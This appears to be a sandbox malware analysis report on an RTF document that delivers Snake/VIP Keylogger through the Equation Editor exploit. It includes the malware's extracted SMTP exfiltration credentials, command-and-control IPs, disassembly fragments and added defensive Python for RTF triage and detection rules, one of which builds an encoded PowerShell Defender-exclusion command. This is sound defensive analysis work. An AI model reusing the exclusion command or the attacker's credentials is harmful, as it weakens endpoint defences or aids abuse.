Windows Analysis Report
na.doc

Overview

General Information

Sample name: na.doc
Analysis ID: 1545181
MD5: 17fbc6bf368de449e0afb59ff45af1fd
SHA1: f4522ebabac9835ecdad5137fa00b185ecbef04c
SHA256: 8c53c38be598e4c508023f712a8b0d84b13ddfd65cbe17ef33a8200d26881f7a
Tags: doc, user-abuse_ch

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Initial sample is an obfuscated RTF file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Sigma detected: Equation Editor Network Connection
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match
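
The signatures "Initial sample is an obfuscated RTF file" and "Office equation editor starts processes" above describe the delivery mechanism: an RTF whose \objdata group carries a hex-encoded OLE1 object that names the Equation Editor class (Equation.3), with junk control words, line breaks and mixed case scattered through the hex so that a naive search for a contiguous hex blob or for the string "Equation.3" misses it. The Python below is an added triage example written for this page; it is not Joe Sandbox code and it does not reproduce na.doc. It builds a constructed stand-in RTF (the embedded native data is only the compound-file magic followed by zero bytes, not a real Equation Native stream and not an exploit), strips the obfuscation, decodes the hex and parses the OLE1 ObjectHeader defined in MS-OLEDS to recover the class name, which is the check that catches this family of documents regardless of how the hex is broken up.

```python
import re
import struct

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"          # OLE compound file header
# {0002CE02-0000-0000-C000-000000000046}, the Equation.3 CLSID, as it is laid
# out on disk (little-endian Data1/2/3) in a compound file's root directory entry.
EQUATION_CLSID = bytes.fromhex("02ce020000000000c000000000000046")
HEXCHARS = set("0123456789abcdefABCDEF")


def build_sample_rtf():
    """Constructed stand-in for an Equation Editor RTF (NOT na.doc): an OLE1
    ObjectHeader naming Equation.3, hex-encoded into \\objdata and obfuscated with
    junk control words, line breaks and mixed case. The native data is only the
    CFB magic plus zero bytes, not a real Equation Native stream or an exploit."""
    native = CFB_MAGIC + b"\x00" * 24
    class_name = b"Equation.3\x00"
    header = struct.pack("<II", 0x00000501, 2)                 # OLEVersion, FormatID=embedded
    header += struct.pack("<I", len(class_name)) + class_name  # ClassName (length incl. NUL)
    header += struct.pack("<II", 0, 0)                         # empty TopicName, ItemName
    header += struct.pack("<I", len(native)) + native          # NativeDataSize, NativeData
    hexdata = header.hex()
    chunks = [hexdata[i:i + 9] for i in range(0, len(hexdata), 9)]
    body = "".join((c.upper() if n % 2 else c) + "\\junk%d \n" % n for n, c in enumerate(chunks))
    return "{\\rtf1{\\object\\objemb{\\*\\objclass Equation.3}{\\*\\objdata " + body + "}}}"


def extract_objdata(rtf):
    """Decode every \\objdata payload, dropping the control words, \\'hh escapes,
    whitespace and nested groups that obfuscators interleave with the hex."""
    payloads = []
    for m in re.finditer(r"\\objdata(?![a-z])", rtf, re.I):
        depth, i, hexbuf = 0, m.end(), []
        while i < len(rtf):
            c = rtf[i]
            if c == "\\":                       # control word, \'hh escape or \x symbol
                cw = re.match(r"\\(?:[A-Za-z]+-?\d*\s?|'[0-9A-Fa-f]{2}|[\s\S])", rtf[i:])
                i += cw.end() if cw else 1
                continue
            if c == "{":
                depth += 1
            elif c == "}":
                if depth == 0:
                    break                       # closing brace of the objdata group
                depth -= 1
            elif depth == 0 and c in HEXCHARS:
                hexbuf.append(c)
            i += 1
        hexstr = "".join(hexbuf)
        payloads.append(bytes.fromhex(hexstr[:len(hexstr) & ~1]))
    return payloads


def parse_ole1_header(data):
    """Parse the OLE1 ObjectHeader (MS-OLEDS) that Word stores in \\objdata."""
    try:
        version, format_id = struct.unpack_from("<II", data, 0)
        off, names = 8, []
        for _ in range(3):                      # ClassName, TopicName, ItemName
            (n,) = struct.unpack_from("<I", data, off)
            off += 4
            names.append(data[off:off + n].rstrip(b"\x00").decode("latin-1"))
            off += n
        (native_size,) = struct.unpack_from("<I", data, off)
        native = data[off + 4:off + 4 + native_size]
    except struct.error:                        # truncated or not an OLE1 header
        return None
    return {"ole_version": version, "format_id": format_id, "class_name": names[0],
            "native_size": native_size, "native_is_cfb": native.startswith(CFB_MAGIC)}


def triage_rtf(rtf):
    """Return one record per embedded object, flagging Equation Editor objects."""
    findings = []
    for payload in extract_objdata(rtf):
        hdr = parse_ole1_header(payload)
        if hdr is None:
            continue
        hdr["equation_editor"] = (hdr["class_name"].lower().startswith("equation")
                                  or EQUATION_CLSID in payload)
        findings.append(hdr)
    return findings


if __name__ == "__main__":
    for record in triage_rtf(build_sample_rtf()):
        print(record)
```

On a real sample, feed the file contents to triage_rtf; any record with equation_editor set is worth isolating, because Equation Editor was removed from Office in 2018 and no legitimate modern document should carry an Equation.3 object. The hex is collected only at group depth 0 so that junk nested groups cannot inject bytes into the decoded object.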

Classification

Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger with many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

AV Detection

Source: na.doc Avira: detected
Source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "whesilolog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "whesilolog@jhxkgroup.online", "Password": "7213575aceACE@@ ", "Host": "mail.jhxkgroup.online", "Port": "587", "Version": "4.4"}
Source: na.doc ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pKL9HXcZosWfPt1[1].exe Joe Sandbox ML: detected

Location Tracking

Source: unknown DNS query: name: reallyfreegeoip.org

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: 87.120.84.38 Port: 80
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49165 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2
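
The Exploits section above is the concrete chain that the Sigma rules in the signature list fire on: WINWORD.EXE starts EQNEDT32.EXE with -Embedding, EQNEDT32.EXE connects to 87.120.84.38:80 and then starts a binary from the user's AppData\Roaming directory; elsewhere the report records a Base64-encoded PowerShell MpPreference cmdlet and DNS lookups of IP-check services. The Python below is an added example, not Joe Sandbox or Sigma code, that expresses those checks as plain rules over Sysmon-style events and runs them on a constructed event list shaped after this report's process tree. The PowerShell event's parent process and exact command line are assumed, since the report does not show who ran the Defender-exclusion cmdlet; the host list for IP-lookup services is likewise an assumption beyond the two names the report contains.

```python
import base64
import re

# Constructed Sysmon-style telemetry (event IDs 1 = process create, 3 = network
# connect, 22 = DNS query). It mirrors the process tree and connections this
# report lists; the PowerShell event's parent and command line are assumed.
OFFICE_DIR = r"C:\Program Files\Microsoft Office\Office14"
EQNEDT_PATH = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
DROPPED = r"C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe"
ENCODED = base64.b64encode(
    'Add-MpPreference -ExclusionPath "C:\\Users\\user\\AppData\\Roaming"'.encode("utf-16-le")
).decode()

EVENTS = [
    {"id": 1, "image": OFFICE_DIR + r"\WINWORD.EXE", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "WINWORD.EXE /n na.doc"},
    {"id": 1, "image": EQNEDT_PATH, "parent": OFFICE_DIR + r"\WINWORD.EXE",
     "cmdline": '"' + EQNEDT_PATH + '" -Embedding'},
    {"id": 3, "image": EQNEDT_PATH, "dst": "87.120.84.38", "dport": 80},
    {"id": 1, "image": DROPPED, "parent": EQNEDT_PATH, "cmdline": DROPPED},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": DROPPED, "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
    {"id": 22, "image": DROPPED, "query": "checkip.dyndns.org"},
    {"id": 22, "image": r"C:\Windows\System32\svchost.exe", "query": "www.microsoft.com"},
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
EQNEDT = "eqnedt32.exe"
IP_LOOKUP_HOSTS = {"checkip.dyndns.org", "reallyfreegeoip.org", "api.ipify.org", "ip-api.com"}
USER_APPDATA = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\", re.I)
DEFENDER_EXCLUSION = re.compile(r"\b(?:Add|Set)-MpPreference\b.*-Exclusion", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the script behind -e/-ec/-enc/-EncodedCommand (Base64 of UTF-16LE), else ''."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def evaluate(events):
    """Run the rules over the events; return (rule_name, evidence) pairs in event order."""
    hits = []
    for ev in events:
        image = basename(ev["image"])
        if ev["id"] == 1:
            parent = basename(ev["parent"])
            if parent in OFFICE_APPS and image == EQNEDT:
                hits.append(("office_spawns_equation_editor", ev["cmdline"]))
            if parent == EQNEDT:  # Equation Editor has no legitimate reason to start children
                rule = ("equation_editor_spawns_user_dir_binary"
                        if USER_APPDATA.match(ev["image"]) else "equation_editor_child_process")
                hits.append((rule, ev["image"]))
            # check the decoded script when -enc is used, otherwise the plain command line
            script = decode_encoded_command(ev["cmdline"]) or ev["cmdline"]
            if DEFENDER_EXCLUSION.search(script):
                hits.append(("defender_exclusion_via_powershell", script))
        elif ev["id"] == 3 and image == EQNEDT:
            hits.append(("equation_editor_network_connection", f'{ev["dst"]}:{ev["dport"]}'))
        elif ev["id"] == 22 and ev["query"].lower() in IP_LOOKUP_HOSTS:
            hits.append(("ip_lookup_service_dns_query", ev["query"]))
    return hits


if __name__ == "__main__":
    for rule, evidence in evaluate(EVENTS):
        print(f"{rule:45s} {evidence}")
```

The Equation Editor rules need no allow-list: EQNEDT32.EXE never legitimately spawns a process or opens a socket, so the first alert is already actionable. The Defender rule decodes -EncodedCommand before matching, which is what the "Powershell Base64 Encoded MpPreference Cmdlet" signature above refers to; matching only the raw command line would miss it. The IP-lookup rule is noisier on its own and is best used as a corroborating signal after one of the others fires.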

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_002B69B8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002B9743h 7_2_002B9330
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002B767Dh 7_2_002B7490
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002B8007h 7_2_002B7490
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002B9181h 7_2_002B8EC2
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002BEB89h 7_2_002BE8A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_002B71C9
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002BF4B9h 7_2_002BF1D9
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002BFDE9h 7_2_002BFB08
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002BF021h 7_2_002BED40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002B9743h 7_2_002B9672
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 002BF951h 7_2_002BF670
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h 7_2_002B6FEA
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005685AAh 7_2_005682B0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00564321h 7_2_00564050
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056E54Ah 7_2_0056E250
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00560311h 7_2_00560040
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00567111h 7_2_00566E40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00568F3Ah 7_2_00568C40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00566349h 7_2_00566078
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00562339h 7_2_00562068
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056CD62h 7_2_0056CA68
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056BF0Ah 7_2_0056BC10
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005650E9h 7_2_00564E18
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005610D9h 7_2_00560E08
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00567F7Ah 7_2_00567C08
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00563101h 7_2_00562E30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056FD32h 7_2_0056FA38
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056A722h 7_2_0056A428
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005607A9h 7_2_005604D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005675A9h 7_2_005672D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056C3D2h 7_2_0056C0D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056DBBAh 7_2_0056D8C0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00563599h 7_2_005632C8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056ABEAh 7_2_0056A8F0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005647B9h 7_2_005644E8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00569D92h 7_2_00569A98
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056B57Ah 7_2_0056B280
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00565581h 7_2_005652B0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00561571h 7_2_005612A0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056F3A2h 7_2_0056F0A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00565A19h 7_2_00565748
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056BA42h 7_2_0056B748
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00560C41h 7_2_00560970
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00567A41h 7_2_00567770
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056F86Ah 7_2_0056F570
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00568A72h 7_2_00568778
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00563A09h 7_2_00563760
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056A25Ah 7_2_00569F60
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005667E2h 7_2_00566510
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056EA12h 7_2_0056E718
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005627D1h 7_2_00562500
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00569402h 7_2_00569108
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056D22Ah 7_2_0056CF30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00561A09h 7_2_00561738
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00561EA1h 7_2_00561BD0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005698CAh 7_2_005695D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056D6F2h 7_2_0056D3F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00565EB1h 7_2_00565BE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056EEDAh 7_2_0056EBE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00562C69h 7_2_00562998
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00564C51h 7_2_00564980
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056E082h 7_2_0056DD88
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00563E89h 7_2_00563BB8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056B0B2h 7_2_0056ADB8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0056C89Ah 7_2_0056C5A0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00566C79h 7_2_005669A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0058033Ah 7_2_00580040
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0058330Ah 7_2_00583010
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00581B22h 7_2_00581828
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005837D2h 7_2_005834D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00581FEAh 7_2_00581CF0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00581192h 7_2_00580E98
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0058297Ah 7_2_00582680
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00582E42h 7_2_00582B48
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0058165Ah 7_2_00581360
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00580802h 7_2_00580508
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00580CCAh 7_2_005809D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 005824B3h 7_2_005821B8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00583C9Ah 7_2_005839A0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062AD11h 7_2_0062AA68
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062BA19h 7_2_0062B770
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00623319h 7_2_00623070
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00624021h 7_2_00623D78
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062C721h 7_2_0062C478
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062EC49h 7_2_0062E978
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062FA11h 7_2_0062F740
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00626FE9h 7_2_00626D40
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00627CF1h 7_2_00627A48
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 006289F9h 7_2_00628750
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00629701h 7_2_00629458
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062C2C9h 7_2_0062C020
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00623BC9h 7_2_00623920
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062CFD1h 7_2_0062CD28
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 006248D1h 7_2_00624628
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 006255D9h 7_2_00625330
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062DCD9h 7_2_0062DA30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 006262E1h 7_2_00626038
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 006292A9h 7_2_00629000
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062F0E1h 7_2_0062EE10
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062B5C1h 7_2_0062B318
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00625E89h 7_2_00625BE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062E7B1h 7_2_0062E4E0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00626B91h 7_2_006268E8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00627899h 7_2_006275F0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 006285A1h 7_2_006282F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062B169h 7_2_0062AEC0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00623771h 7_2_006234C8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062BE71h 7_2_0062BBC8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062CB7Bh 7_2_0062C8D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00624479h 7_2_006241D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00625181h 7_2_00624ED8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062D881h 7_2_0062D5D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00628149h 7_2_00627EA0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062F579h 7_2_0062F2A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00628E51h 7_2_00628BA8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00629B59h 7_2_006298B0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062D429h 7_2_0062D180
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00624D29h 7_2_00624A80
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00625A31h 7_2_00625788
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 0062E1C5h 7_2_0062DE88
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00626739h 7_2_00626490
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 4x nop then jmp 00627441h 7_2_00627198
